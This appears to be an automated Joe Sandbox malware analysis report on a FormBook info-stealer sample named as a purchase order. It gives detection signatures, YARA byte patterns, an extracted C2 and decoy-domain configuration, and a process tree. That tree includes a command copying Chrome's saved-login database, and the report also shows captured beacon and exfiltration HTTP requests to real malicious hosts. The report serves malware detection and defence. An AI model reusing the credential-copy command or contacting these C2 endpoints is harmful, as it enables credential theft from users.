Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO#12108997.exe

Overview

General Information

Sample Name:PO#12108997.exe
Analysis ID:626541
MD5:5f6801fb007ede49a68943ef905b54c6
SHA1:a01e755201a0f7caec5b123db1d26776948d33c4
SHA256:ce5e4278243ecbcd11f46db7a76dc39f0ce091914bf298af73fb4e1e5391441b
Tags:exeformbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Detected FormBook malware
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • PO#12108997.exe (PID: 6956 cmdline: "C:\Users\user\Desktop\PO#12108997.exe" MD5: 5F6801FB007EDE49A68943EF905B54C6)
    • vbc.exe (PID: 6236 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 7148 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 2488 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.mybenefitassist.com/p12s/"], "decoy": ["kaylaspann.com", "miumiu-turkey.com", "carlomarlo.com", "roucee.com", "lizardheartmall.xyz", "cromen.finance", "harum4d.life", "codynolovenft.com", "mbughwiniadventure.com", "bodybreathintelligence.com", "dewajitu88.club", "65ur345fg.xyz", "merion.art", "crown-regroup.com", "lonazao.space", "expresspatriotsammoandguns.com", "mediapopuli.net", "stoppie.site", "nyajuicebar.com", "mackeyfi8.club", "bumesta.com", "theconttcom.com", "hgsiftaradogru.com", "bliss-togo.com", "wellnesstogether.one", "mortgagestoday.net", "chadmansfieldhomeloans.com", "gura.world", "energyhealingwithmark.com", "ifrassi.com", "actionyardgames.com", "azndmeapp.com", "brandtbusinessservices.net", "lasemdrabat.com", "waterdogsupply.com", "crosscitypest.com", "tombstoned-webapp.com", "mfeybteqb.xyz", "thefunfun3studio.space", "fs-motor.net", "evakonetworks.com", "faru.store", "procopiospizzamenu.com", "intobet543.com", "villefry.com", "courtkristineartistry.com", "mikecartonly.com", "usketoout.site", "nookmaniabuyacnhitems.com", "bygym.xyz", "tyz.world", "natwestcryptoinvestment.com", "aaeedahsbangles.com", "globalhealthindex.com", "facialmate.com", "cognitohealthcareeducation.com", "iyziw.com", "denbos.xyz", "madurababe.net", "weshoppe.net", "theclotheslibrary.com", "bysarahdeshmeh.com", "williamsonortho.com", "codegreenagroallied.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x26b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x21a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x27b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x292f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x141c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x8927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x993a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x5849:$sqlite3step: 68 34 1C 7B E1
    • 0x595c:$sqlite3step: 68 34 1C 7B E1
    • 0x5878:$sqlite3text: 68 38 2A 90 C5
    • 0x599d:$sqlite3text: 68 38 2A 90 C5
    • 0x588b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x59b3:$sqlite3blob: 68 53 D8 7F 8C
    00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c93a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 30 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.0.vbc.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.0.vbc.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.0.vbc.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
        4.0.vbc.exe.400000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.0.vbc.exe.400000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 22 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.mybenefitassist.com/p12s/"], "decoy": ["kaylaspann.com", "miumiu-turkey.com", "carlomarlo.com", "roucee.com", "lizardheartmall.xyz", "cromen.finance", "harum4d.life", "codynolovenft.com", "mbughwiniadventure.com", "bodybreathintelligence.com", "dewajitu88.club", "65ur345fg.xyz", "merion.art", "crown-regroup.com", "lonazao.space", "expresspatriotsammoandguns.com", "mediapopuli.net", "stoppie.site", "nyajuicebar.com", "mackeyfi8.club", "bumesta.com", "theconttcom.com", "hgsiftaradogru.com", "bliss-togo.com", "wellnesstogether.one", "mortgagestoday.net", "chadmansfieldhomeloans.com", "gura.world", "energyhealingwithmark.com", "ifrassi.com", "actionyardgames.com", "azndmeapp.com", "brandtbusinessservices.net", "lasemdrabat.com", "waterdogsupply.com", "crosscitypest.com", "tombstoned-webapp.com", "mfeybteqb.xyz", "thefunfun3studio.space", "fs-motor.net", "evakonetworks.com", "faru.store", "procopiospizzamenu.com", "intobet543.com", "villefry.com", "courtkristineartistry.com", "mikecartonly.com", "usketoout.site", "nookmaniabuyacnhitems.com", "bygym.xyz", "tyz.world", "natwestcryptoinvestment.com", "aaeedahsbangles.com", "globalhealthindex.com", "facialmate.com", "cognitohealthcareeducation.com", "iyziw.com", "denbos.xyz", "madurababe.net", "weshoppe.net", "theclotheslibrary.com", "bysarahdeshmeh.com", "williamsonortho.com", "codegreenagroallied.com"]}
          Multi AV Scanner detection for submitted file
          Source: PO#12108997.exeVirustotal: Detection: 34%Perma Link
          Source: PO#12108997.exeReversingLabs: Detection: 61%
          Yara detected FormBook
          Source: Yara matchFile source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO#12108997.exe.45a9b80.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO#12108997.exe.4525160.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.303082018.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.501599813.00000000007C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.268315926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.502562113.0000000004670000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.349002729.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.268000165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.320563409.000000000D72E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.348817611.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.349085650.0000000005450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.502601399.00000000046A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.272836579.0000000004485000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Machine Learning detection for sample
          Source: PO#12108997.exeJoe Sandbox ML: detected
          Source: 4.0.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.0.vbc.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.0.vbc.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: PO#12108997.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
          Source: PO#12108997.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ActivityCont.pdb source: PO#12108997.exe
          Source: Binary string: cmmon32.pdb source: vbc.exe, 00000004.00000002.349181179.0000000005540000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: ActivityCont.pdbh source: PO#12108997.exe
          Source: Binary string: cmmon32.pdbGCTL source: vbc.exe, 00000004.00000002.349181179.0000000005540000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000004.00000002.349226595.0000000005550000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.349502353.000000000566F000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.268678658.000000000521F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.270731207.00000000053B2000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000002.503794062.0000000004B4F000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000002.503522121.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.348874642.0000000004700000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.350723138.0000000004899000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000002.349226595.0000000005550000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.349502353.000000000566F000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.268678658.000000000521F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000003.270731207.00000000053B2000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000011.00000002.503794062.0000000004B4F000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000002.503522121.0000000004A30000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.348874642.0000000004700000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000011.00000003.350723138.0000000004899000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: vbc.pdb source: cmmon32.exe, 00000011.00000002.502692331.0000000004705000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then pop esi
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 4x nop then pop edi

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.10 80
          Source: C:\Windows\explorer.exeDomain query: www.tyz.world
          Source: C:\Windows\explorer.exeDomain query: www.madurababe.net
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.mybenefitassist.com/p12s/
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /p12s/?q88dJ=WbLp3RdxCDJd&3f=8qmMWLN6/JQqhm+wveR6/OJHhm8N3VLr8xJt4w8M8t9FDLm1ANqb2O/T37+jkq0kwDJA HTTP/1.1Host: www.tyz.worldConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p12s/?3f=r50L8sv8FZiHucxi8RnCmWG3E/gD+O9hwT0hmGjF5KhMWddC+dQqagaFzg96cYhfQjEI&q88dJ=WbLp3RdxCDJd HTTP/1.1Host: www.madurababe.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 188.114.97.10 188.114.97.10
          Source: Joe Sandbox ViewIP Address: 188.114.97.10 188.114.97.10
          Source: global trafficHTTP traffic detected: POST /p12s/ HTTP/1.1Host: www.tyz.worldConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.tyz.worldUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tyz.world/p12s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 3d 30 49 71 32 49 76 78 63 79 5a 38 6b 6a 6e 4f 38 75 5a 34 4e 7e 36 77 67 6d 6b 73 58 28 47 53 73 71 55 49 71 6b 6a 41 56 77 34 31 45 46 34 69 46 41 50 7a 32 32 61 36 64 6e 62 66 51 34 36 51 34 37 68 45 78 59 6a 54 68 38 47 34 54 65 34 79 76 74 53 31 4e 38 56 6f 6c 35 6f 58 64 56 6e 39 55 71 64 53 56 36 48 33 49 43 77 53 4f 67 34 63 73 68 49 4c 46 53 47 4b 70 48 52 7a 57 6c 6c 63 41 66 64 62 48 74 4b 75 30 63 31 41 6c 59 44 66 54 6d 33 46 47 30 39 4a 4e 75 48 36 30 66 58 67 51 46 31 38 43 62 50 65 31 6c 76 77 37 46 49 6d 4f 4d 34 37 42 34 67 43 48 36 65 4d 56 67 74 78 5f 45 4f 42 69 56 52 58 4b 64 67 66 30 6c 33 37 53 36 42 54 70 39 32 32 5f 68 64 6f 78 4e 6d 43 55 4e 43 76 38 30 37 4d 4d 47 57 44 51 4d 54 48 75 74 66 77 75 62 5a 56 63 4b 43 64 48 72 47 52 46 50 51 73 67 71 73 78 53 46 43 4a 4c 63 49 65 41 31 36 28 65 47 48 37 55 6e 57 79 4b 68 38 6c 5f 39 55 56 44 73 4d 37 72 4e 52 38 33 72 42 57 46 6f 46 75 56 72 52 71 79 33 68 45 36 78 52 68 6e 4c 6c 28 69 32 6a 32 37 55 66 4d 75 44 51 71 38 62 55 47 42 42 6d 77 5f 61 33 47 53 56 41 47 51 56 41 57 6e 64 72 74 37 77 7a 37 4e 49 5f 42 62 69 59 6b 61 7e 65 47 48 57 6b 73 5a 7a 35 38 71 55 51 7a 53 57 76 74 47 75 65 59 73 4a 6a 4e 44 35 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3f=0Iq2IvxcyZ8kjnO8uZ4N~6wgmksX(GSsqUIqkjAVw41EF4iFAPz22a6dnbfQ46Q47hExYjTh8G4Te4yvtS1N8Vol5oXdVn9UqdSV6H3ICwSOg4cshILFSGKpHRzWllcAfdbHtKu0c1AlYDfTm3FG09JNuH60fXgQF18CbPe1lvw7FImOM47B4gCH6eMVgtx_EOBiVRXKdgf0l37S6BTp922_hdoxNmCUNCv807MMGWDQMTHutfwubZVcKCdHrGRFPQsgqsxSFCJLcIeA16(eGH7UnWyKh8l_9UVDsM7rNR83rBWFoFuVrRqy3hE6xRhnLl(i2j27UfMuDQq8bUGBBmw_a3GSVAGQVAWndrt7wz7NI_BbiYka~eGHWksZz58qUQzSWvtGueYsJjND5A).
          Source: global trafficHTTP traffic detected: POST /p12s/ HTTP/1.1Host: www.tyz.worldConnection: closeContent-Length: 148780Cache-Control: no-cacheOrigin: http://www.tyz.worldUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tyz.world/p12s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 3d 30 49 71 32 49 72 46 49 30 70 6f 35 78 42 7e 5f 70 5a 6f 46 76 4c 42 39 6b 58 59 66 34 56 76 56 6e 6b 6b 36 6b 6d 4a 53 39 63 78 4a 54 6f 53 46 51 39 62 78 77 36 36 65 6c 62 66 52 70 72 74 4e 37 79 55 35 59 68 28 66 38 47 77 4d 51 66 43 6d 74 69 30 4e 38 31 74 51 28 70 32 50 56 68 30 38 71 37 4c 4b 39 48 4c 49 49 6b 7e 51 6c 5a 73 33 32 35 48 77 4d 6d 6d 67 46 52 62 54 6c 31 78 35 65 5f 6e 68 71 4c 79 32 57 6a 6f 2d 55 67 48 33 73 45 55 58 78 73 35 4b 72 46 48 71 62 30 55 63 47 30 39 69 59 4e 32 30 6f 5f 6f 35 41 4c 7e 77 49 4d 72 30 36 77 65 54 36 59 6f 6a 34 76 31 71 4f 70 42 51 53 6b 76 67 57 78 72 32 67 45 69 58 7e 44 4c 2d 79 57 47 51 7e 70 73 51 4b 31 57 64 4f 45 71 37 71 75 67 42 45 44 37 63 55 7a 57 58 67 76 45 32 53 34 6c 7a 4e 46 35 55 35 58 78 64 4f 56 31 42 79 73 77 2d 48 43 4a 66 58 62 47 6f 78 64 76 52 55 7a 28 36 74 46 44 4e 32 64 35 37 36 53 64 4c 76 73 50 71 4b 68 41 4e 6a 51 6e 79 73 32 43 53 38 43 33 48 7a 68 45 6e 73 69 4a 73 4c 6c 28 66 32 6d 44 55 58 4c 4d 75 4d 68 4b 76 58 58 75 4e 51 57 77 59 64 6a 61 55 63 54 53 41 56 41 75 6e 64 61 64 52 77 44 44 4e 45 4d 70 59 69 38 77 61 77 4f 47 48 44 55 73 4c 7a 5a 52 49 52 48 37 37 62 38 5a 67 6d 2d 6b 37 63 78 49 37 69 38 5a 48 65 36 49 68 6c 35 78 56 78 69 68 53 6e 5f 6d 6a 78 75 28 5a 59 4b 52 36 4c 6f 70 4a 67 30 37 59 42 51 4a 4a 51 76 39 59 71 49 36 35 67 78 4e 58 6c 30 74 7a 32 75 4d 4b 62 33 55 33 70 71 59 35 74 6d 46 6f 6d 36 52 38 54 41 37 38 6f 47 77 4a 56 4f 65 66 74 41 6e 79 64 4b 52 39 56 47 72 31 4e 66 76 42 41 52 56 6d 45 75 45 54 52 48 35 41 6f 30 33 4e 53 36 5a 46 30 4d 6d 52 47 72 55 65 5a 63 78 76 55 63 49 66 71 4c 44 77 76 44 59 78 68 48 35 70 5a 6c 74 75 28 4c 45 36 4e 52 47 63 72 32 67 65 6c 66 44 45 45 46 69 51 31 48 6a 57 65 69 6d 6a 56 52 74 75 59 2d 33 58 38 43 52 43 38 4c 4b 78 6d 4b 59 48 72 76 7a 78 28 78 7e 39 64 5f 71 70 50 65 30 50 33 6e 45 6d 50 74 4e 69 46 34 77 2d 43 56 46 2d 68 74 65 5a 69 6f 38 31 79 66 39 69 47 4b 41 57 41 79 33 50 41 30 34 54 75 31 28 4b 30 58 43 69 78 71 49 6f 67 4f 4f 56 52 57 45 5a 57 42 52 4c 79 41 59 69 39 38 54 30 63 37 73 54 41 53 6b 4a 30 65 65 70 43 56 7a 43 70 73 79 7a 28 6f 76 67 56 42 56 48 78 49 42 65 59 36 70 69 5a 5a 71 48 45 45 77 33 73 37 78 4f 53 7a 54 5f 34 70 42 68 74 57 37 37 6b 38 4d 74 6f 62 42 35 28 44 71 47 6f 4d 36 7a 39 56 54 77 38 54 74 5a 4e 42 67 4b 78 74 47 69 44 78 6d 4a 62 48 37 58 76 54 71 64 42 5a 42 50 5a 48 58 76 67 52 39 71 39 64 37 4f 56 73 6c 44 35 4d 4d 54 57 66 47 4e 37 66 50 75 56 52 69 74 76 32 58 5f 76 4b 4a 49 48 69 45 44 4a 49 77 5a 56 70 78 48 30 58 6e 31 59 54 32 4e 71 64 53 66 6b 41
          Source: global trafficHTTP traffic detected: POST /p12s/ HTTP/1.1Host: www.madurababe.netConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.madurababe.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.madurababe.net/p12s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 3d 6a 62 34 78 69 4d 54 78 62 34 71 31 36 62 38 45 67 6b 6d 64 38 44 4b 76 45 76 51 54 31 4b 70 54 6b 45 38 35 33 33 72 62 79 66 78 53 64 70 56 34 37 64 5a 79 50 30 58 33 67 52 77 45 56 4d 42 49 51 54 70 43 6d 33 5a 39 65 2d 39 39 61 4d 7a 34 51 6b 4b 33 68 31 6a 76 53 57 30 71 6f 77 54 66 47 70 7a 35 7e 6f 43 72 64 4d 63 34 74 63 36 41 67 6b 6d 37 6c 4c 45 59 49 6c 72 4b 72 43 38 7a 78 62 63 69 35 31 30 43 59 4b 41 36 38 55 77 36 50 62 28 72 6f 6b 76 48 6a 61 4c 65 66 6a 33 30 77 68 58 78 57 7a 73 57 6e 61 79 59 4d 6e 31 58 6d 58 6a 44 4f 59 64 76 4f 4c 6b 4d 56 56 4b 4b 4d 33 58 6f 34 77 6a 5f 41 78 52 4b 32 62 31 36 63 73 6a 62 43 4c 6e 69 61 4b 71 70 48 77 51 39 30 4b 6e 47 58 6b 41 33 47 30 70 68 61 79 4f 57 71 43 6a 69 64 42 61 76 73 4b 75 4b 38 36 33 54 41 42 72 6b 31 59 6b 78 5a 6f 75 37 64 77 31 42 34 6f 41 78 76 65 71 39 64 61 6c 44 43 48 6c 76 39 57 30 6b 59 46 54 41 75 6e 79 5a 66 44 6d 4b 49 44 45 32 4a 32 72 66 68 35 70 68 47 52 54 6c 68 42 39 6f 28 51 4b 37 33 31 42 43 63 45 42 37 61 61 76 45 39 39 73 4d 28 30 59 64 31 65 48 50 72 7a 43 77 28 6a 35 4b 38 42 62 43 75 75 78 34 78 68 34 49 7a 64 66 68 4a 6d 6f 66 4e 70 57 65 68 47 4b 48 54 45 73 4c 4a 31 69 75 68 4f 51 75 65 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3f=jb4xiMTxb4q16b8Egkmd8DKvEvQT1KpTkE8533rbyfxSdpV47dZyP0X3gRwEVMBIQTpCm3Z9e-99aMz4QkK3h1jvSW0qowTfGpz5~oCrdMc4tc6Agkm7lLEYIlrKrC8zxbci510CYKA68Uw6Pb(rokvHjaLefj30whXxWzsWnayYMn1XmXjDOYdvOLkMVVKKM3Xo4wj_AxRK2b16csjbCLniaKqpHwQ90KnGXkA3G0phayOWqCjidBavsKuK863TABrk1YkxZou7dw1B4oAxveq9dalDCHlv9W0kYFTAunyZfDmKIDE2J2rfh5phGRTlhB9o(QK731BCcEB7aavE99sM(0Yd1eHPrzCw(j5K8BbCuux4xh4IzdfhJmofNpWehGKHTEsLJ1iuhOQuew).
